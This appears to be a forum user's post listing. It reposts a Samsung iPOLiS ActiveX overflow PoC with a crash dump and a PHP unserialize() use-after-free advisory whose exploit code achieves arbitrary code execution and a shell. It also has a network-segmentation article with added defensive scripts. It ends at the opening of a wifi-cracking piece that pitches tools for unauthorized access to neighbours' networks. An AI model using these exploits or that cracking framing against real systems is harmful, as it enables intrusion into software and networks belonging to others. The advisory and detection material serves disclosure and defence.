Everything posted by Aerosol
-
<!--
# Exploit Title: (0day) Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555

targetFile          = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype           = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName          = "WriteConfigValue"
progid              = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System    = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2

CERT tried to coordinate but there wasn't any response from Samsung
-->
<head>
<title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC</title>
</head>
<body>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'></object>
<script>
// szKey is an oversized string of 'A' (0x41) bytes; szValue is an arbitrary short string.
// The crash trace below shows the 0x41 bytes reaching EBP+8 and the return address.
var arg1 = "";
var arg2 = "praveend";
var i;
for (i = 0; i <= 15000; i++) {
    arg1 += "A";
}
target.WriteConfigValue(arg1, arg2);
</script>
</body>
</html>
<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434 MOV AL,[ESI+EDX]

Seh Chain:
--------------------------------------------------
1  647C7D7D  mfc100.dll
2  647D0937  mfc100.dll
3  64E242CA  VBSCRIPT.dll
4  77B3E0ED  ntdll.dll

Called From              Returns To
--------------------------------------------------
XNSSDKDEVICE.149434      41414141
41414141                 414141
414141                   3DA4C4
3DA4C4                   mfc100.647790C1
mfc100.647790C1          56746C75

Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C

Block Disassembly:
--------------------------------------------------
149423 XOR EDI,EDI
149425 XOR ESI,ESI
149427 MOV [EBP-8C],ECX
14942D TEST ECX,ECX
14942F JLE SHORT 00149496
149431 MOV EDX,[EBP+8]
149434 MOV AL,[ESI+EDX]        <--- CRASH
149437 CMP AL,2F
149439 JNZ SHORT 00149489
14943B MOV ECX,EBX
14943D TEST ESI,ESI
14943F JNZ SHORT 0014944D
149441 PUSH 159F28
149446 CALL 0014F7C0
14944B JMP SHORT 00149476

ArgDump:
--------------------------------------------------
EBP+8  00414141
EBP+12 003DA4C4 -> Asc: defaultV
EBP+16 647790C1 -> EBE84589
EBP+20 FFFFFFFE
EBP+24 646CBE5C -> CCCCCCC3
EBP+28 0000001C

Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
-->
Source
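The practical check for this advisory is whether the control can still be instantiated by Internet Explorer on a given host: a control is blocked when the "Compatibility Flags" REG_DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} has bit 0x400 (the kill bit) set. The script below is an added example and not part of the PoC or of Samsung's software; the CLSID is the one from the PoC's object tag, the kill-bit value and key path are Microsoft's documented ones (KB240797), and the registry access is Windows-only while the decision logic is plain Python.

```python
"""Kill-bit check for the XnsSdkDeviceIpInstaller control (example, not vendor code)."""
import sys

CLSID = "{D3B78638-78BA-4587-88FE-0537A0825A72}"   # classid from the PoC's <object> tag
KILL_BIT = 0x00000400                               # ActiveX Compatibility kill bit
COMPAT_SUBKEY = "SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility"
CLSID_SUBKEY = "SOFTWARE\\Classes\\CLSID"


def is_killed(compat_flags):
    """True only if a Compatibility Flags entry exists and has the kill bit set.
    No entry (None) means IE will load the control."""
    return compat_flags is not None and bool(compat_flags & KILL_BIT)


def verdict(compat_flags, installed=True):
    """Triage text for one registry view."""
    if not installed:
        return "control not registered: not exposed"
    if is_killed(compat_flags):
        return "kill bit set: control blocked in IE"
    if compat_flags is None:
        return "no Compatibility Flags entry: control loadable in IE"
    return "Compatibility Flags=0x%08x without kill bit: control loadable in IE" % compat_flags


def read_registry_views(clsid=CLSID):
    """Query both the 32-bit and 64-bit registry views (Windows only); a 32-bit
    OCX on 64-bit Windows is registered and kill-bitted in the 32-bit view."""
    import winreg  # only available on Windows
    results = {}
    for name, view in (("32-bit", winreg.KEY_WOW64_32KEY), ("64-bit", winreg.KEY_WOW64_64KEY)):
        access = winreg.KEY_READ | view
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CLSID_SUBKEY + "\\" + clsid, 0, access):
                installed = True
        except OSError:
            installed = False
        flags = None
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, COMPAT_SUBKEY + "\\" + clsid, 0, access) as key:
                flags, _ = winreg.QueryValueEx(key, "Compatibility Flags")
        except OSError:
            pass  # no kill-bit entry for this CLSID in this view
        results[name] = verdict(flags, installed)
    return results


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("registry check runs on Windows only")
    for view, text in read_registry_views().items():
        print(view + ": " + text)
```

If the verdict is "loadable", the documented mitigation is to create the entry with the kill bit set (reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D3B78638-78BA-4587-88FE-0537A0825A72}" /v "Compatibility Flags" /t REG_DWORD /d 1024), which stops IE from instantiating the control without uninstalling iPOLiS.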
-
Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

Taoguang Chen <@chtg> (http://github.com/chtg)
Write Date: 2015.1.29
Release Date: 2015.2.20

A use-after-free vulnerability was discovered in unserialize() with the __wakeup() magic method of DateTime/DateTimeZone/DateInterval/DatePeriod objects that can be abused for leaking arbitrary memory blocks or executing arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------
    static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)
    {
        zval *z_date;
        zval *z_timezone;
        zval *z_timezone_type;
        zval tmp_obj;
        timelib_tzinfo *tzi;
        php_timezone_obj *tzobj;

        z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
        if (z_date) {
            convert_to_string(z_date);
            z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1);
            if (z_timezone_type) {
                convert_to_long(z_timezone_type);
                z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
                if (z_timezone) {
                    convert_to_string(z_timezone);
    ...

    static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
    {
        zval **z_timezone = NULL;
        zval **z_timezone_type = NULL;

        if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) {
            if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
                convert_to_long(*z_timezone_type);
                if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {
                    return SUCCESS;
                }
            }
        }
        return FAILURE;
    }

The convert_to_long() call leads to the ZVAL and all its children being freed from memory. However, the unserialize() code will still allow R: or r: to set references to that already freed memory. This is a use-after-free vulnerability, and it allows arbitrary code to be executed.

Proof of Concept Exploit
------------
The PoC works on a standard MacOSX 10.10.2 installation of PHP 5.5.14.

    <?php
    $f = $argv[1];
    $c = $argv[2];

    // Fake PHP 5 zval #1: value pointer, length 8, refcount 0, type 0x06 (IS_STRING), is_ref 0
    $fakezval1 = ptr2str(0x100b83008);
    $fakezval1 .= ptr2str(0x8);
    $fakezval1 .= "\x00\x00\x00\x00";
    $fakezval1 .= "\x06";
    $fakezval1 .= "\x00";
    $fakezval1 .= "\x00\x00";

    // convert_to_long() frees the timezone_type array; R:4 then references the freed slot,
    // which the string in index 1 reoccupies.
    $data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
    $x = unserialize($data1);
    $y = $x[2];

    // zend_eval_string()'s address
    $y[0][0] = "\x6d";
    $y[0][1] = "\x1e";
    $y[0][2] = "\x35";
    $y[0][3] = "\x00";
    $y[0][4] = "\x01";
    $y[0][5] = "\x00";
    $y[0][6] = "\x00";
    $y[0][7] = "\x00";

    // Fake zval #2: type 0x05 (IS_OBJECT); the first 8 bytes are the string "$f($c);"
    $fakezval2 = ptr2str(0x3b296324286624); // $f($c);
    $fakezval2 .= ptr2str(0x100b83000);
    $fakezval2 .= "\x00\x00\x00\x00";
    $fakezval2 .= "\x05";
    $fakezval2 .= "\x00";
    $fakezval2 .= "\x00\x00";

    $data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
    $z = unserialize($data2);

    // Little-endian 8-byte encoding of an integer
    function ptr2str($ptr)
    {
        $out = "";
        for ($i = 0; $i < 8; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }
    ?>

Test the PoC on the command line, then any PHP code can be executed:

    $ lldb php
    (lldb) target create "php"
    Current executable set to 'php' (x86_64).
    (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
    Process 13472 launched: '/usr/bin/php' (x86_64)
    sh: no job control in this shell
    sh-3.2$ php -v
    PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
    Copyright (c) 1997-2014 The PHP Group
    Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
    sh-3.2$ exit
    exit
    Process 13472 exited with status = 0 (0x00000000)
    (lldb)

Source
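The advisory's trigger has a recognisable shape in the serialized bytes: a DateTime* object whose timezone_type (or timezone/date) property is not a scalar, plus an R:/r: back-reference into the slot that convert_to_long() frees. Where untrusted input still reaches unserialize() on an unpatched release, that shape can be screened for before the call. The scanner below is an added example written for this page, not code from the advisory or from PHP; it is a minimal reader for the serialize() grammar (N, b, i, d, s, a, O, R, r) that records the Date* classes, back-references and non-scalar Date* properties it meets, and the payloads in the test are constructed from the advisory's PoC with a short placeholder in place of the fake zval.

```python
"""Screen a PHP serialize() payload for the CVE-2015-0273 trigger shape (added example)."""

DATE_CLASSES = {"DateTime", "DateTimeZone", "DateInterval", "DatePeriod"}
DATE_PROPS = {b"date", b"timezone_type", b"timezone"}   # inputs consumed by the Date* __wakeup()


class PhpSerialScanner:
    """Recursive-descent reader for the serialize() format that keeps triage facts as it goes."""

    def __init__(self, blob: bytes):
        self.b = blob
        self.i = 0
        self.classes = []           # every O: class name, in parse order
        self.backrefs = []          # every (kind, slot) seen as R:slot; / r:slot;
        self.date_non_scalar = []   # (class, property) where a Date* wakeup input is not int/string

    def _expect(self, tok: bytes) -> None:
        if not self.b.startswith(tok, self.i):
            raise ValueError("expected %r at offset %d" % (tok, self.i))
        self.i += len(tok)

    def _int_until(self, stop: bytes) -> int:
        j = self.b.index(stop, self.i)
        n = int(self.b[self.i:j])
        self.i = j + 1
        return n

    def _raw(self, n: int) -> bytes:
        s = self.b[self.i:self.i + n]
        if len(s) != n:
            raise ValueError("truncated string at offset %d" % self.i)
        self.i += n
        return s

    def _members(self, count: int) -> dict:
        """Parse `{key;value ...}` for arrays and objects; keys must be int or string."""
        self._expect(b"{")
        out = {}
        for _ in range(count):
            key = self.value()
            if not isinstance(key, (int, bytes)):
                raise ValueError("non-scalar key at offset %d" % self.i)
            out[key] = self.value()
        self._expect(b"}")
        return out

    def value(self):
        if self.i >= len(self.b):
            raise ValueError("unexpected end of data")
        t = chr(self.b[self.i])
        if t == "N":
            self._expect(b"N;")
            return None
        self._expect(t.encode() + b":")
        if t == "i":
            return self._int_until(b";")
        if t == "b":
            return self._int_until(b";") == 1
        if t == "d":
            j = self.b.index(b";", self.i)
            v = float(self.b[self.i:j])
            self.i = j + 1
            return v
        if t == "s":                      # s:len:"bytes"; length-prefixed, may hold binary
            n = self._int_until(b":")
            self._expect(b'"')
            s = self._raw(n)
            self._expect(b'";')
            return s
        if t in "Rr":                     # back-reference to an earlier value slot
            slot = self._int_until(b";")
            self.backrefs.append((t, slot))
            return ("ref", t, slot)
        if t == "a":
            return self._members(self._int_until(b":"))
        if t == "O":                      # O:len:"Class":count:{...}
            n = self._int_until(b":")
            self._expect(b'"')
            cls = self._raw(n).decode("ascii", "replace")
            self._expect(b'":')
            props = self._members(self._int_until(b":"))
            self.classes.append(cls)
            if cls in DATE_CLASSES:
                for k, v in props.items():
                    if k in DATE_PROPS and not isinstance(v, (int, bytes)):
                        self.date_non_scalar.append((cls, k.decode()))
            return (cls, props)
        raise ValueError("unsupported type %r at offset %d" % (t, self.i))


def scan(blob: bytes) -> dict:
    """Return triage facts; 'suspicious' marks the advisory's shape (Date* object + back-reference)."""
    s = PhpSerialScanner(blob)
    s.value()
    if s.i != len(blob):
        raise ValueError("trailing data after serialized value")
    date_objects = [c for c in s.classes if c in DATE_CLASSES]
    return {
        "date_objects": date_objects,
        "backrefs": s.backrefs,
        "date_non_scalar": s.date_non_scalar,
        "suspicious": bool(date_objects and s.backrefs) or bool(s.date_non_scalar),
    }
```

The scanner rejects rather than repairs anything it cannot parse, which is the right failure mode for a pre-filter: a payload that does not fit the grammar should not be handed to unserialize() either. Upgrading to a fixed release and never unserializing untrusted input remain the actual fixes.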
-
Introduction

Last year – dubbed "the Year of the Hack" – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and the lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What's wrong here? It seems likely that data traffic security and network security have not kept abreast of technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc.

Network Segmentation & Data Encryption

Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for data that traverses external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption, ranging from Web-based/HTTPS encryption to SSL-based VPNs.

Enhanced Security with Proper Network Segmentation

a) Unauthorized network access can be limited through network segmentation or security "zoning". This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network. At the same time, segregating the network properly will enable access for those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones.

Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, "the ability to contain network problems, improve performance, and reduce congestion."

Diagram 1: "Example of Network Segmentation (Part 1)"
Diagram 2: "Example of Network Segmentation (Part 2)"

VLAN Network Segmentation and Security

Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. Proper VLAN segmentation can significantly hinder threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location.

What do the critics say about VLANs?

VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management are concerned. That is because: "they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn't always possible."

Next-Generation Networks

Software Defined Networking (SDN), Network Virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of the entire network architecture. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies:

Software Defined Networking (SDN)

In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed:

- The centralized controller as a "potential single point of attack and failure."
- The southbound interface between the controller and data-forwarding devices is "vulnerable to threats that could degrade the availability, performance and integrity of the network."

Measures within the SDN's architecture:

- Secure the access to the Controller – protecting the Controller means protecting your SDN;
- Create a trusted network environment between the SDN Controller, the applications, and the devices, which will protect the communications throughout the network;
- Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller;
- Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis).

Security outside the architecture can be embedded in servers, storage and other computing apparatuses.

Network Functions Virtualization (NFV)

There are two basic security threats for NFVs:

1) A combination of all generic virtualization threats;
2) Threats specific to the network function software.

However, virtualization gives some complementary security by eliminating or mitigating several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving the NFV's security, Andreas Lemke advises users to utilize the following two-pronged combination:

"Reducing generic virtualization threats as much as possible by securing the virtualization platform
Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection"

Drafting a stringent security policy on what is to be transferred from zone to zone is the next step:

- Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and to areas where there is no other information beyond what is required.
- A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic.
- Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party.
- Define "good faith", innocuous communication paths and block suspicious data traffic.
- Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones.
- Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment.

There are standards that can provide guidance on how to set up efficient separation of data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is one such standard, and in this case sensitive information like payment card data should be isolated from the rest of the network.

Case Study: Target Data Breach

As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to secure in a proper fashion the access of third parties to their payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is in itself non-compliance with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company's point-of-sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place.

Enhanced Security with Proper Encryption

The classical security architecture counts on the establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question, as if the old maxim "Hope for the best and prepare for (assume) the worst" is better justified in terms of real-deal proactive security measures like encryption, especially for the preservation of sensitive data.

A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existing fragmented environment.

Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to make. The following statistic reflects on the aforementioned subject: "45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on." Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption.

II. Mobile Data Traffic and Network Security

The mobile unencrypted traffic from apps is growing each month. At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords.

Diagram 3. Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati).

Bring Your Own Device (BYOD)

Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data entrusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (which could be IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environments is vital for complying with the current standards in terms of efficiency and security.

The silo style of mobility

Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company. The silo-based nature of all mobile devices, however, localizes the perimeter protection to the company's boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor can obtain and leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not possess antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered "safe" and "trusted" (see Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and secure or isolate internal applications containing sensitive servers.

Diagram 4

Conclusion

The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Allocating funds to network security projects for this year is envisaged by approximately two-thirds of all enterprises participating in the interview. We can only hope that these measures will not come as "too little, too late". And while the investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our personal perception to these changes.

Reference List

Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/
Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10
Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/
Cryptzone. Network Segmentation. Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation
Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise
Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687
McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack
Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html
Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf
Olzak, T. (2012). VLAN Network Segmentation and Security – Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/
Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html
Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/
Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation
SDNCentral. SDN Security Challenges in SDN Environments. Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/
TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf
Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html

Diagrams 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634

Source
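The zone policy steps and the Target case study above share one lesson that a rule-by-rule review misses: every individual allow rule can look reasonable while the rules chain into a path from a third-party zone to the cardholder zone. The script below is an added example, not from the article or from any of its sources; the zone names, allowed flows and flow records are constructed for illustration. It evaluates flow records against a default-deny zone matrix and then walks the matrix as a graph to find any multi-hop route from an untrusted zone to a sensitive one.

```python
"""Zone-matrix review: direct violations plus transitive reachability (added example)."""
from collections import deque
from typing import Dict, List, Optional, Set, Tuple

Edge = Tuple[str, str, int]   # (source zone, destination zone, destination TCP port)

# Constructed default-deny policy: only the listed flows are allowed.
ALLOWED: Set[Edge] = {
    ("internet",  "dmz",        443),
    ("vendor",    "corporate",  443),    # third-party maintenance portal
    ("corporate", "cardholder", 1433),   # back-office reporting job into the POS database
    ("corporate", "dmz",        8443),
    ("dmz",       "corporate",  636),
}
SENSITIVE = "cardholder"   # PCI-DSS scope


def is_allowed(policy: Set[Edge], src: str, dst: str, port: int) -> bool:
    """Intra-zone traffic is the segment's own business; everything else needs a rule."""
    return src == dst or (src, dst, port) in policy


def violations(policy: Set[Edge], flows: List[Edge]) -> List[Edge]:
    """Flow records (e.g. from firewall or NetFlow logs) that the matrix does not permit."""
    return [f for f in flows if not is_allowed(policy, *f)]


def reachable_from(policy: Set[Edge], start: str) -> Dict[str, List[str]]:
    """Breadth-first walk over allowed edges, ignoring ports: zone -> zone path from start."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        zone = queue.popleft()
        for src, dst, _ in sorted(policy):      # sorted for deterministic output
            if src == zone and dst not in paths:
                paths[dst] = paths[zone] + [dst]
                queue.append(dst)
    return paths


def lateral_exposure(policy: Set[Edge], untrusted: str,
                     sensitive: str = SENSITIVE) -> Optional[List[str]]:
    """The zone chain by which an untrusted zone can reach the sensitive zone, or None."""
    return reachable_from(policy, untrusted).get(sensitive)


# Constructed flow records for a review run: one is a direct policy violation.
FLOWS: List[Edge] = [
    ("vendor",    "corporate",  443),
    ("vendor",    "cardholder", 445),
    ("corporate", "cardholder", 1433),
]

if __name__ == "__main__":
    for flow in violations(ALLOWED, FLOWS):
        print("denied by policy:", flow)
    path = lateral_exposure(ALLOWED, "vendor")
    print("vendor -> cardholder path:", " -> ".join(path) if path else "none")
```

Run against the constructed policy, the direct check flags only the vendor-to-cardholder SMB flow, while the reachability walk reports vendor -> corporate -> cardholder: the vendor zone never talks to the cardholder zone directly, yet a compromised vendor account that lands in the corporate zone inherits the reporting job's path to the POS database. Dropping the corporate-to-cardholder rule (or moving that job into a dedicated jump zone) breaks the chain.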
-
The Internet is now a basic need of our daily life. With the increasing use of smartphones, most things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use them for free. But most of these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks.

Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing.

In this article, I am going to discuss wireless security and the best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks.

Wireless Networks and Hacking

